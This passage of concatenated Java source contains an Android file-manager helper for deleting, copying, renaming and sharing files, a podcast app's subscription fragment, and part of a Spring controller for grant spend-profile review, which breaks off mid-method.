                            progressDialog.setProgressStyle(ProgressDialog.STYLE_HORIZONTAL);
                            progressDialog.setCancelable(false);
                            progressDialog.setProgress(0);
                            progressDialog.setMessage("");
                            progressDialog.show();
                            executor.execute(new Runnable() {
                                @Override
                                public void run() {
                                    int i = 0;
                                    // float so the i/TOTAL_ITEMS progress ratio is fractional
                                    float TOTAL_ITEMS = selectedItems.size();
                                    try {
                                        for (; i < selectedItems.size(); i++) {
                                            mUIUpdateHandler.post(mHelper.progressUpdater(progressDialog, (int)((i/TOTAL_ITEMS)*100), "File: "+selectedItems.get(i).getFile().getName()));
                                            if (selectedItems.get(i).getFile().isDirectory()) {
                                                FileUtils.deleteDirectory(selectedItems.get(i).getFile());
                                            } else {
                                                FileUtils.forceDelete(selectedItems.get(i).getFile());
                                            }
                                        }
                                        mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog));
                                        mUIUpdateHandler.post(mHelper.updateRunner());
                                    } catch (IOException e) {
                                        e.printStackTrace();
                                        mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog));
                                        mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while deleting "));
                                    }
                                }
                            });
                        }
                    })
                    .setNegativeButton(android.R.string.no, new DialogInterface.OnClickListener() {
                        public void onClick(DialogInterface dialog, int which) {
                            // do nothing
                            dialog.dismiss();
                        }
                    })
                    .setIcon(android.R.drawable.ic_dialog_alert)
                    .show();
        } else {
            UIUtils.ShowToast("No Items Selected!",mContext);
        }
    }

    /**
     * Copies or moves the globally selected files (from {@link Operations}) into
     * {@code destination}, per the pending COPY/CUT operation, updating a progress dialog.
     * Resets the pending operation on success. No-ops with a toast when the destination is
     * not writable or nothing is selected.
     */
    public void pasteFiles(final File destination) {
        final Operations op = Operations.getInstance(mContext);
        final List<FileItem> selectedItems = op.getSelectedFiles();
        final Operations.FILE_OPERATIONS operation = op.getOperation();
        if(destination.canWrite()) {
            if (selectedItems != null && selectedItems.size() > 0) {
                final ProgressDialog progressDialog = new ProgressDialog(mContext);
                String title = "Please Wait... ";
                progressDialog.setTitle(title);
                if (operation == Operations.FILE_OPERATIONS.COPY)
                    progressDialog.setTitle("Copying " + title);
                else if (operation == Operations.FILE_OPERATIONS.CUT)
                    progressDialog.setTitle("Moving " + title);
                progressDialog.setProgressStyle(ProgressDialog.STYLE_HORIZONTAL);
                progressDialog.setCancelable(false);
                progressDialog.setMessage("");
                progressDialog.setProgress(0);
                progressDialog.show();
                executor.execute(new Runnable() {
                    @Override
                    public void run() {
                        int i = 0;
                        float TOTAL_ITEMS = selectedItems.size();
                        try {
                            for (; i < selectedItems.size(); i++) {
                                mUIUpdateHandler.post(mHelper.progressUpdater(progressDialog, (int) ((i / TOTAL_ITEMS) * 100), "File: " + selectedItems.get(i).getFile().getName()));
                                // directories and plain files use different commons-io helpers
                                if (selectedItems.get(i).getFile().isDirectory()) {
                                    if (operation == Operations.FILE_OPERATIONS.CUT)
                                        FileUtils.moveDirectory(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName()));
                                    else if (operation == Operations.FILE_OPERATIONS.COPY)
                                        FileUtils.copyDirectory(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName()));
                                } else {
                                    if (operation == Operations.FILE_OPERATIONS.CUT)
                                        FileUtils.moveFile(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName()));
                                    else if (operation == Operations.FILE_OPERATIONS.COPY)
                                        FileUtils.copyFile(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName()));
                                }
                            }
                            // clear the pending COPY/CUT state on the UI thread
                            mUIUpdateHandler.post(new Runnable() {
                                @Override
                                public void run() {
                                    op.resetOperation();
                                }
                            });
                            mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog));
                            mUIUpdateHandler.post(mHelper.updateRunner());
                        } catch (IOException e) {
                            e.printStackTrace();
                            mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog));
                            mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while pasting "));
                        }
                    }
                });
            } else {
                UIUtils.ShowToast("No Items Selected!", mContext);
            }
        } else {
            UIUtils.ShowToast("No Write permissions for the paste directory",mContext);
        }
    }

    /**
     * Prompts for a new name, then renames the file/directory (implemented as a move within
     * the same parent) on the worker thread. The entered name is trimmed before use.
     */
    public void renameFile(final FileItem fileItem) {
        UIUtils.showEditTextDialog(mContext, "Rename", fileItem.getFile().getName() ,new IFuncPtr() {
            @Override
            public void execute(final String val) {
                executor.execute(new Runnable() {
                    @Override
                    public void run() {
                        try {
                            if(fileItem.getFile().isDirectory())
                                FileUtils.moveDirectory(fileItem.getFile(),new File(fileItem.getFile().getParentFile(), val.trim()));
                            else
                                FileUtils.moveFile(fileItem.getFile(),new File(fileItem.getFile().getParentFile(), val.trim()));
                            mUIUpdateHandler.post(mHelper.updateRunner());
                        } catch (Exception e) {
                            e.printStackTrace();
                            mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while renaming "));
                        }
                    }
                });
            }
        });
    }

    /**
     * Shows a properties dialog: type/size/last-modified/path for a single selection, or
     * type and combined size for a multi-selection.
     *
     * <p>NOTE(review): sizeOfDirectory walks the tree on the calling thread — this runs on
    * the UI thread; confirm acceptable for large directories. SimpleDateFormat is created
     * without an explicit Locale — TODO confirm intended.
     */
    public void getProperties(List<FileItem> selectedItems) {
        StringBuilder msg = new StringBuilder();
        if(selectedItems.size()==1) {
            boolean isDirectory = (selectedItems.get(0).getFile().isDirectory());
            String type = isDirectory?"Directory":"File";
            String size = FileUtils.byteCountToDisplaySize(isDirectory?FileUtils.sizeOfDirectory(selectedItems.get(0).getFile()):FileUtils.sizeOf(selectedItems.get(0).getFile()));
            String lastModified = new SimpleDateFormat(Constants.DATE_FORMAT).format(selectedItems.get(0).getFile().lastModified());
            msg.append("Type : " + type + "\n\n");
            msg.append("Size : " + size + "\n\n");
            msg.append("Last Modified : " + lastModified + "\n\n");
            msg.append("Path : "+selectedItems.get(0).getFile().getAbsolutePath());
        } else {
            long totalSize = 0;
            for(int i=0;i<selectedItems.size();i++) {
                boolean isDirectory = (selectedItems.get(i).getFile().isDirectory());
                totalSize += isDirectory?FileUtils.sizeOfDirectory(selectedItems.get(i).getFile()):FileUtils.sizeOf(selectedItems.get(i).getFile());
            }
            msg.append("Type : " + "Multiple Files" + "\n\n");
            msg.append("Size : " + FileUtils.byteCountToDisplaySize(totalSize) + "\n\n");
        }
        UIUtils.ShowMsg(msg.toString(),"Properties",mContext);
    }

    /**
     * Launches a share chooser for the given files via ACTION_SEND_MULTIPLE, or shows a
     * toast when no app can handle the intent.
     *
     * <p>NOTE(review): Uri.fromFile triggers FileUriExposedException on API 24+ unless a
     * FileProvider is used — confirm the app's targetSdkVersion.
     */
    public void shareMultipleFiles(List<FileItem> filesToBeShared){
        ArrayList<Uri> uris = new ArrayList<>();
        for(FileItem file: filesToBeShared){
            uris.add(Uri.fromFile(file.getFile()));
        }
        final Intent intent = new Intent(Intent.ACTION_SEND_MULTIPLE);
        intent.setType("*/*");
        intent.putParcelableArrayListExtra(Intent.EXTRA_STREAM, uris);
        PackageManager manager = mContext.getPackageManager();
        List<ResolveInfo> infos = manager.queryIntentActivities(intent, 0);
        if (infos.size() > 0) {
            mContext.startActivity(Intent.createChooser(intent, mContext.getString(R.string.share)));
        } else {
            UIUtils.ShowToast("No app found to handle sharing",mContext);
        }
    }
}
package com.clem.ipoca1.fragment; import android.content.DialogInterface; import android.content.Intent; import android.os.Bundle; import android.support.v4.app.Fragment; import android.support.v4.view.ViewCompat; import android.util.Log; import android.view.ContextMenu; import android.view.LayoutInflater; import android.view.MenuInflater; import android.view.MenuItem; import android.view.View; import android.view.ViewGroup; import android.widget.AdapterView; import android.widget.GridView; import com.clem.ipoca1.R; import com.clem.ipoca1.activity.MainActivity; import com.clem.ipoca1.adapter.SubscriptionsAdapter; import com.clem.ipoca1.core.asynctask.FeedRemover; import com.clem.ipoca1.core.dialog.ConfirmationDialog; import com.clem.ipoca1.core.feed.EventDistributor; import com.clem.ipoca1.core.feed.Feed; import com.clem.ipoca1.core.preferences.PlaybackPreferences; import com.clem.ipoca1.core.service.playback.PlaybackService; import com.clem.ipoca1.core.storage.DBReader; import com.clem.ipoca1.core.storage.DBWriter; import com.clem.ipoca1.core.util.FeedItemUtil; import com.clem.ipoca1.dialog.RenameFeedDialog; import rx.Observable; import rx.Subscription; import rx.android.schedulers.AndroidSchedulers; import rx.schedulers.Schedulers; /** * Fragment for displaying feed subscriptions */ public class SubscriptionFragment extends Fragment { public static final String TAG = "SubscriptionFragment"; private static final int EVENTS = EventDistributor.FEED_LIST_UPDATE | EventDistributor.UNREAD_ITEMS_UPDATE; private GridView subscriptionGridLayout; private DBReader.NavDrawerData navDrawerData; private SubscriptionsAdapter subscriptionAdapter; private int mPosition = -1; private Subscription subscription; public SubscriptionFragment() { } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setRetainInstance(true); // So, we certainly *don't* have an options menu, // but unless we say we do, old options menus sometimes // persist. 
mfietz thinks this causes the ActionBar to be invalidated setHasOptionsMenu(true); } @Override public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View root = inflater.inflate(R.layout.fragment_subscriptions, container, false); subscriptionGridLayout = (GridView) root.findViewById(R.id.subscriptions_grid); ViewCompat.setNestedScrollingEnabled(subscriptionGridLayout, true); registerForContextMenu(subscriptionGridLayout); return root; } @Override public void onActivityCreated(Bundle savedInstanceState) { super.onActivityCreated(savedInstanceState); loadSubscriptions(); if (getActivity() instanceof MainActivity) { ((MainActivity) getActivity()).getSupportActionBar().setTitle(R.string.subscriptions_label); } EventDistributor.getInstance().register(contentUpdate); } @Override public void onDestroy() { super.onDestroy(); if (subscription != null) { subscription.unsubscribe(); } } private void loadSubscriptions() { if (subscription != null) { subscription.unsubscribe(); } subscription = Observable.fromCallable(DBReader::getNavDrawerData) .subscribeOn(Schedulers.newThread()) .observeOn(AndroidSchedulers.mainThread()) .subscribe(result -> { navDrawerData = result; subscriptionAdapter = new SubscriptionsAdapter((MainActivity) getActivity(), itemAccess); subscriptionGridLayout.setAdapter(subscriptionAdapter); subscriptionGridLayout.setOnItemClickListener(subscriptionAdapter); }, error -> Log.e(TAG, Log.getStackTraceString(error))); } @Override public void onCreateContextMenu(ContextMenu menu, View v, ContextMenu.ContextMenuInfo menuInfo) { super.onCreateContextMenu(menu, v, menuInfo); AdapterView.AdapterContextMenuInfo adapterInfo = (AdapterView.AdapterContextMenuInfo) menuInfo; int position = adapterInfo.position; Object selectedObject = subscriptionAdapter.getItem(position); if (selectedObject.equals(SubscriptionsAdapter.ADD_ITEM_OBJ)) { mPosition = position; return; } Feed feed = (Feed) selectedObject; MenuInflater inflater = 
getActivity().getMenuInflater(); inflater.inflate(R.menu.nav_feed_context, menu); menu.setHeaderTitle(feed.getTitle()); mPosition = position; } @Override public boolean onContextItemSelected(MenuItem item) { final int position = mPosition; mPosition = -1; // reset if (position < 0) { return false; } Object selectedObject = subscriptionAdapter.getItem(position); if (selectedObject.equals(SubscriptionsAdapter.ADD_ITEM_OBJ)) { // this is the add object, do nothing return false; } Feed feed = (Feed) selectedObject; switch (item.getItemId()) { case R.id.mark_all_seen_item: Observable.fromCallable(() -> DBWriter.markFeedSeen(feed.getId())) .subscribeOn(Schedulers.newThread()) .observeOn(AndroidSchedulers.mainThread()) .subscribe(result -> loadSubscriptions(), error -> Log.e(TAG, Log.getStackTraceString(error))); return true; case R.id.mark_all_read_item: Observable.fromCallable(() -> DBWriter.markFeedRead(feed.getId())) .subscribeOn(Schedulers.newThread()) .observeOn(AndroidSchedulers.mainThread()) .subscribe(result -> loadSubscriptions(), error -> Log.e(TAG, Log.getStackTraceString(error))); return true; case R.id.rename_item: new RenameFeedDialog(getActivity(), feed).show(); return true; case R.id.remove_item: final FeedRemover remover = new FeedRemover(getContext(), feed) { @Override protected void onPostExecute(Void result) { super.onPostExecute(result); loadSubscriptions(); } }; ConfirmationDialog conDialog = new ConfirmationDialog(getContext(), R.string.remove_feed_label, getString(R.string.feed_delete_confirmation_msg, feed.getTitle())) { @Override public void onConfirmButtonPressed( DialogInterface dialog) { dialog.dismiss(); long mediaId = PlaybackPreferences.getCurrentlyPlayingFeedMediaId(); if (mediaId > 0 && FeedItemUtil.indexOfItemWithMediaId(feed.getItems(), mediaId) >= 0) { Log.d(TAG, "Currently playing episode is about to be deleted, skipping"); remover.skipOnCompletion = true; int playerStatus = PlaybackPreferences.getCurrentPlayerStatus(); if 
(playerStatus == PlaybackPreferences.PLAYER_STATUS_PLAYING) { getActivity().sendBroadcast(new Intent( PlaybackService.ACTION_PAUSE_PLAY_CURRENT_EPISODE)); } } remover.executeAsync(); } }; conDialog.createNewDialog().show(); return true; default: return super.onContextItemSelected(item); } } @Override public void onResume() { super.onResume(); loadSubscriptions(); } private EventDistributor.EventListener contentUpdate = new EventDistributor.EventListener() { @Override public void update(EventDistributor eventDistributor, Integer arg) { if ((EVENTS & arg) != 0) { Log.d(TAG, "Received contentUpdate Intent."); loadSubscriptions(); } } }; private SubscriptionsAdapter.ItemAccess itemAccess = new SubscriptionsAdapter.ItemAccess() { @Override public int getCount() { if (navDrawerData != null) { return navDrawerData.feeds.size(); } else { return 0; } } @Override public Feed getItem(int position) { if (navDrawerData != null && 0 <= position && position < navDrawerData.feeds.size()) { return navDrawerData.feeds.get(position); } else { return null; } } @Override public int getFeedCounter(long feedId) { return navDrawerData != null ? navDrawerData.feedCounters.get(feedId) : 0; } }; }
package org.innovateuk.ifs.project.spendprofile.controller; import org.innovateuk.ifs.commons.service.ServiceResult; import org.innovateuk.ifs.competition.resource.CompetitionResource; import org.innovateuk.ifs.competition.service.CompetitionRestService; import org.innovateuk.ifs.controller.ValidationHandler; import org.innovateuk.ifs.organisation.resource.OrganisationResource; import org.innovateuk.ifs.project.ProjectService; import org.innovateuk.ifs.project.core.ProjectParticipantRole; import org.innovateuk.ifs.project.monitoring.service.MonitoringOfficerRestService; import org.innovateuk.ifs.project.resource.ApprovalType; import org.innovateuk.ifs.project.resource.ProjectOrganisationCompositeId; import org.innovateuk.ifs.project.resource.ProjectResource; import org.innovateuk.ifs.project.resource.ProjectUserResource; import org.innovateuk.ifs.project.spendprofile.SpendProfileSummaryModel; import org.innovateuk.ifs.project.spendprofile.SpendProfileTableCalculator; import org.innovateuk.ifs.project.spendprofile.form.SpendProfileForm; import org.innovateuk.ifs.project.spendprofile.form.SpendProfileReviewForm; import org.innovateuk.ifs.project.spendprofile.resource.SpendProfileResource; import org.innovateuk.ifs.project.spendprofile.resource.SpendProfileTableResource; import org.innovateuk.ifs.project.spendprofile.validation.SpendProfileCostValidator; import org.innovateuk.ifs.project.spendprofile.viewmodel.ProjectSpendProfileProjectSummaryViewModel; import org.innovateuk.ifs.project.spendprofile.viewmodel.ProjectSpendProfileViewModel; import org.innovateuk.ifs.project.status.resource.ProjectTeamStatusResource; import org.innovateuk.ifs.spendprofile.OrganisationReviewDetails; import org.innovateuk.ifs.spendprofile.SpendProfileService; import org.innovateuk.ifs.status.StatusService; import org.innovateuk.ifs.user.resource.UserResource; import org.innovateuk.ifs.user.service.OrganisationRestService; import org.innovateuk.ifs.util.PrioritySorting; import 
org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Qualifier; import org.springframework.beans.factory.annotation.Value; import org.springframework.security.access.prepost.PreAuthorize; import org.springframework.security.core.parameters.P; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.validation.BindingResult; import org.springframework.validation.ObjectError; import org.springframework.web.bind.annotation.*; import java.math.BigDecimal; import java.util.*; import java.util.function.Supplier; import java.util.stream.Collectors; import static org.innovateuk.ifs.commons.error.CommonFailureKeys.SPEND_PROFILE_CANNOT_MARK_AS_COMPLETE_BECAUSE_SPEND_HIGHER_THAN_ELIGIBLE; import static org.innovateuk.ifs.competition.publiccontent.resource.FundingType.LOAN; import static org.innovateuk.ifs.project.constant.ProjectActivityStates.COMPLETE; import static org.innovateuk.ifs.project.constant.ProjectActivityStates.LEAD_ACTION_REQUIRED; import static org.innovateuk.ifs.util.CollectionFunctions.simpleFindFirst; /** * This controller will handle all requests that are related to spend profile. 
*/
@Controller
@RequestMapping("/" + ProjectSpendProfileController.BASE_DIR + "/{projectId}/partner-organisation/{organisationId}/spend-profile")
public class ProjectSpendProfileController {

    // View-template root; also spliced into the class-level @RequestMapping above.
    static final String BASE_DIR = "project";
    // Template shown to project managers / monitoring officers reviewing all partners.
    private static final String REVIEW_TEMPLATE_NAME = "spend-profile-review";
    // Model attribute name under which forms are exposed to the templates.
    private static final String FORM_ATTR_NAME = "form";

    @Autowired
    private ProjectService projectService;

    @Autowired
    private StatusService statusService;

    @Autowired
    private OrganisationRestService organisationRestService;

    @Autowired
    private SpendProfileService spendProfileService;

    @Autowired
    private SpendProfileTableCalculator spendProfileTableCalculator;

    // Explicit qualifier: more than one Validator bean may exist in the context.
    @Autowired
    @Qualifier("spendProfileCostValidator")
    private SpendProfileCostValidator spendProfileCostValidator;

    @Autowired
    private CompetitionRestService competitionRestService;

    @Autowired
    private MonitoringOfficerRestService monitoringOfficerRestService;

    // Feature toggle for the monitoring-officer spend-profile journey.
    @Value("${ifs.monitoringofficer.spendprofile.update.enabled}")
    private boolean moSpendProfileJourneyUpdateEnabled;

    /**
     * Entry point for the spend-profile section. Monitoring officers and members of the lead
     * organisation get the project-wide summary view; all other users are sent to the
     * single-organisation review page.
     */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')")
    @GetMapping
    public String viewSpendProfile(@ModelAttribute(value = "form", binding = false) SpendProfileReviewForm form,
                                   Model model,
                                   @P("projectId")@PathVariable("projectId") final Long projectId,
                                   @PathVariable("organisationId") final Long organisationId,
                                   UserResource loggedInUser) {
        ProjectResource projectResource = projectService.getById(projectId);
        boolean isMonitoringOfficer = monitoringOfficerRestService.isMonitoringOfficerOnProject(projectId, loggedInUser.getId()).getSuccess();
        if (isMonitoringOfficer || isUserPartOfLeadOrganisation(projectId, loggedInUser)) {
            return viewProjectManagerSpendProfile(model, projectResource, loggedInUser, isMonitoringOfficer);
        }
        return reviewSpendProfilePage(model, projectId, organisationId, loggedInUser);
    }

    /** Renders a single organisation's spend-profile table for review. */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')")
    @GetMapping("/review")
    public String reviewSpendProfilePage(Model model,
                                         @P("projectId")@PathVariable("projectId") final Long projectId,
                                         @PathVariable("organisationId") final Long organisationId,
                                         UserResource loggedInUser) {
        model.addAttribute("model", buildSpendProfileViewModel(projectId, organisationId, loggedInUser));
        model.addAttribute(FORM_ATTR_NAME, null);
        return BASE_DIR + "/spend-profile";
    }

    /**
     * Approves or rejects the project's spend profile from the submitted review form,
     * redirecting to the project page on success; validation failures re-render the
     * spend-profile view.
     */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'REVIEW_SPEND_PROFILE')")
    @PostMapping
    public String submitSpendProfileReview(Model model,
                                           @ModelAttribute(value = "form") SpendProfileReviewForm form,
                                           @SuppressWarnings("unused") BindingResult bindingResult,
                                           ValidationHandler validationHandler,
                                           @P("projectId")@PathVariable Long projectId,
                                           @PathVariable("organisationId") final Long organisationId,
                                           UserResource loggedInUser) {
        Supplier<String> failureView = () -> viewSpendProfile(form, model, projectId, organisationId, loggedInUser);
        ApprovalType approvalType = form.isApproved() ? ApprovalType.APPROVED : ApprovalType.REJECTED;
        ServiceResult<Void> generateResult = spendProfileService.approveOrRejectSpendProfile(projectId, approvalType);
        return validationHandler.addAnyErrors(generateResult).failNowOrSucceedWith(failureView, () ->
                submitSpendProfileReviewSuccessView(projectId)
        );
    }

    private String submitSpendProfileReviewSuccessView(Long projectId) {
        return "redirect:/project/" + projectId;
    }

    /**
     * Opens the spend-profile table for editing. If the table is currently marked complete it
     * is first marked incomplete so the partner can change it again.
     */
    @PreAuthorize("hasPermission(new org.innovateuk.ifs.project.resource.ProjectOrganisationCompositeId(#projectId, #organisationId), 'EDIT_SPEND_PROFILE_SECTION')")
    @GetMapping("/edit")
    public String editSpendProfile(Model model,
                                   @ModelAttribute(name = FORM_ATTR_NAME, binding = false) SpendProfileForm form,
                                   @SuppressWarnings("unused") BindingResult bindingResult,
                                   ValidationHandler validationHandler,
                                   @P("projectId")@PathVariable("projectId") final Long projectId,
                                   @P("organisationId")@PathVariable("organisationId") final Long organisationId,
                                   UserResource loggedInUser) {
        String failureView = "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile";
        ProjectResource projectResource = projectService.getById(projectId);
        SpendProfileTableResource spendProfileTableResource = spendProfileService.getSpendProfileTable(projectId, organisationId);
        form.setTable(spendProfileTableResource);
        if (!spendProfileTableResource.getMarkedAsComplete()) {
            model.addAttribute("model", buildSpendProfileViewModel(projectResource, organisationId, spendProfileTableResource, loggedInUser));
            // NOTE(review): both outcomes resolve to the same template here — failures carry
            // binding errors into the view rather than redirecting.
            return validationHandler.failNowOrSucceedWith(() -> BASE_DIR + "/spend-profile",
                    () -> BASE_DIR + "/spend-profile");
        } else {
            ServiceResult<Void> result = markSpendProfileIncomplete(projectId, organisationId);
            return validationHandler.addAnyErrors(result).failNowOrSucceedWith(() -> failureView, () -> {
                model.addAttribute("model", buildSpendProfileViewModel(projectResource, organisationId, spendProfileTableResource, loggedInUser));
                return BASE_DIR + "/spend-profile";
            });
        }
    }

    /**
     * Persists edited monthly costs for an organisation's spend profile. Validation failures
     * re-render the edit view with the user's figures (nulls displayed as zeros).
     */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')")
    @PostMapping("/edit")
    public String saveSpendProfile(Model model,
                                   @ModelAttribute(FORM_ATTR_NAME) SpendProfileForm form,
                                   @SuppressWarnings("unused") BindingResult bindingResult,
                                   ValidationHandler validationHandler,
                                   @P("projectId")@PathVariable("projectId") final Long projectId,
                                   @PathVariable("organisationId") final Long organisationId,
                                   UserResource loggedInUser) {
        Supplier<String> failureView = () -> {
            // On failure, overlay the user's entered costs on the stored table so nothing typed is lost.
            SpendProfileTableResource updatedTable = form.getTable();
            SpendProfileTableResource originalTableWithUpdatedCosts = spendProfileService.getSpendProfileTable(projectId, organisationId);
            originalTableWithUpdatedCosts.setMonthlyCostsPerCategoryMap(updatedTable.getMonthlyCostsPerCategoryMap());
            ProjectResource project = projectService.getById(projectId);
            return doEditSpendProfile(model, form, organisationId, loggedInUser, project, originalTableWithUpdatedCosts);
        };
        spendProfileCostValidator.validate(form.getTable(), bindingResult);
        return validationHandler.failNowOrSucceedWith(failureView, () -> {
            SpendProfileTableResource spendProfileTableResource = spendProfileService.getSpendProfileTable(projectId, organisationId);
            // update existing resource with user entered fields
            spendProfileTableResource.setMonthlyCostsPerCategoryMap(form.getTable().getMonthlyCostsPerCategoryMap());
            ServiceResult<Void> result = spendProfileService.saveSpendProfile(projectId, organisationId, spendProfileTableResource);
            return validationHandler.addAnyErrors(result).failNowOrSucceedWith(failureView, () ->
                    saveSpendProfileSuccessView(projectId, organisationId, loggedInUser.getId()));
        });
    }

    // Lead partners land on the review page after saving; other partners return to the table.
    private String saveSpendProfileSuccessView(final Long projectId, final Long organisationId, final Long userId) {
        final String urlSuffix = projectService.isUserLeadPartner(projectId, userId) ? "/review" : "";
        return "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile" + urlSuffix;
    }

    /**
     * Marks another organisation's spend profile as incomplete (action required) so they can
     * edit it again. The IS_NOT_FROM_OWN_ORGANISATION permission stops a partner doing this to
     * their own profile.
     */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION') && hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'MARK_SPEND_PROFILE_INCOMPLETE') && hasPermission(#projectOrganisationCompositeId, 'IS_NOT_FROM_OWN_ORGANISATION')")
    @PostMapping("/incomplete")
    public String markAsActionRequiredSpendProfile(Model model,
                                                   @ModelAttribute(FORM_ATTR_NAME) SpendProfileForm form,
                                                   @SuppressWarnings("unused") BindingResult bindingResult,
                                                   ValidationHandler validationHandler,
                                                   @P("projectId")@PathVariable("projectId") final Long projectId,
                                                   @P("organisationId")@PathVariable("organisationId") final Long organisationId,
                                                   ProjectOrganisationCompositeId projectOrganisationCompositeId,
                                                   UserResource loggedInUser) {
        Supplier<String> failureView = () -> reviewSpendProfilePage(model, projectId, organisationId, loggedInUser);
        String successView = "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile";
        ServiceResult<Void> result = markSpendProfileIncomplete(projectId, organisationId);
        return validationHandler.addAnyErrors(result).failNowOrSucceedWith(failureView, () -> successView);
    }

    /** Marks this organisation's spend profile as complete, returning to the table view. */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')")
    @PostMapping("/complete")
    public String markAsCompleteSpendProfile(Model model,
                                             @P("projectId")@PathVariable("projectId") final Long projectId,
                                             @P("organisationId")@PathVariable("organisationId") final Long organisationId,
                                             UserResource loggedInUser) {
        return markSpendProfileComplete(model, projectId, organisationId, "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile", loggedInUser);
    }

    /** Confirmation page shown before marking a spend profile complete. */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')")
    @GetMapping("/confirm")
    public String viewConfirmSpendProfilePage(@P("projectId")@PathVariable("projectId") final Long projectId,
                                              @PathVariable("organisationId") final Long organisationId,
                                              Model model,
                                              UserResource loggedInUser) {
        ProjectSpendProfileViewModel viewModel = buildSpendProfileViewModel(projectId, organisationId, loggedInUser);
        model.addAttribute("model", viewModel);
        return "project/spend-profile-confirm";
    }

    /** Confirmation page shown before allowing another organisation's profile to be edited. */
    @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION') && hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'MARK_SPEND_PROFILE_INCOMPLETE') && hasPermission(#projectOrganisationCompositeId, 'IS_NOT_FROM_OWN_ORGANISATION')")
    @GetMapping("/incomplete")
    public String viewConfirmEditSpendProfilePage(@P("projectId")@PathVariable("projectId") final Long projectId,
                                                  @PathVariable("organisationId") final Long organisationId,
                                                  ProjectOrganisationCompositeId projectOrganisationCompositeId,
                                                  Model model,
                                                  UserResource loggedInUser) {
        ProjectSpendProfileViewModel viewModel = buildSpendProfileViewModel(projectId, organisationId, loggedInUser);
        model.addAttribute("model", viewModel);
        return "project/spend-profile-confirm-edits";
    }

    /**
     * Re-renders the edit view with the supplied (possibly invalid) table, first replacing any
     * null monthly costs with zeros so the template always has a value to display.
     */
    private String doEditSpendProfile(Model model, SpendProfileForm form, final Long organisationId, final UserResource loggedInUser, ProjectResource project, SpendProfileTableResource spendProfileTableResource) {
        spendProfileTableResource.getMonthlyCostsPerCategoryMap().keySet().forEach(key -> {
            List<BigDecimal> monthlyCostNullsReplacedWithZeros = new ArrayList<>();
            boolean monthlyCostNullsReplaced = false;
            for (BigDecimal mon : spendProfileTableResource.getMonthlyCostsPerCategoryMap().get(key)) {
                if (null == mon) {
                    monthlyCostNullsReplaced = true;
                    monthlyCostNullsReplacedWithZeros.add(BigDecimal.ZERO);
                } else {
                    monthlyCostNullsReplacedWithZeros.add(mon);
                }
            }
            // Only rewrite the category row when at least one null was found.
            if (monthlyCostNullsReplaced) {
                Map<Long, List<BigDecimal>> updatedCostPerCategoryMap = spendProfileTableResource.getMonthlyCostsPerCategoryMap();
                updatedCostPerCategoryMap.replace(key, monthlyCostNullsReplacedWithZeros);
                spendProfileTableResource.setMonthlyCostsPerCategoryMap(updatedCostPerCategoryMap);
            }
        });
        form.setTable(spendProfileTableResource);
        model.addAttribute("model", buildSpendProfileViewModel(project, organisationId, spendProfileTableResource, loggedInUser));
        return BASE_DIR + "/spend-profile";
    }

    /** Project-wide summary view for project managers and monitoring officers. */
    private String viewProjectManagerSpendProfile(Model model, final ProjectResource projectResource, final UserResource loggedInUser, final boolean isMonitoringOfficer) {
        model.addAttribute("model", populateSpendProfileProjectManagerViewModel(projectResource, loggedInUser, isMonitoringOfficer));
        return BASE_DIR + "/" + REVIEW_TEMPLATE_NAME;
    }

    /**
     * Marks the profile complete; on failure (totals exceed eligible costs) re-renders the
     * table with an explanatory error instead of redirecting.
     */
    private String markSpendProfileComplete(Model model, final Long projectId, final Long organisationId, final String successView, final UserResource loggedInUser) {
        ServiceResult<Void> result = spendProfileService.markSpendProfileComplete(projectId, organisationId);
        if (result.isFailure()) {
            ProjectSpendProfileViewModel spendProfileViewModel = buildSpendProfileViewModel(projectId, organisationId, loggedInUser);
            spendProfileViewModel.setObjectErrors(Collections.singletonList(new ObjectError(SPEND_PROFILE_CANNOT_MARK_AS_COMPLETE_BECAUSE_SPEND_HIGHER_THAN_ELIGIBLE.getErrorKey(), "Cannot mark as complete, because totals more than eligible")));
            model.addAttribute("model", spendProfileViewModel);
            return BASE_DIR + "/spend-profile";
        } else {
            return successView;
        }
    }

    private ServiceResult<Void> markSpendProfileIncomplete(final Long projectId, final Long organisationId) {
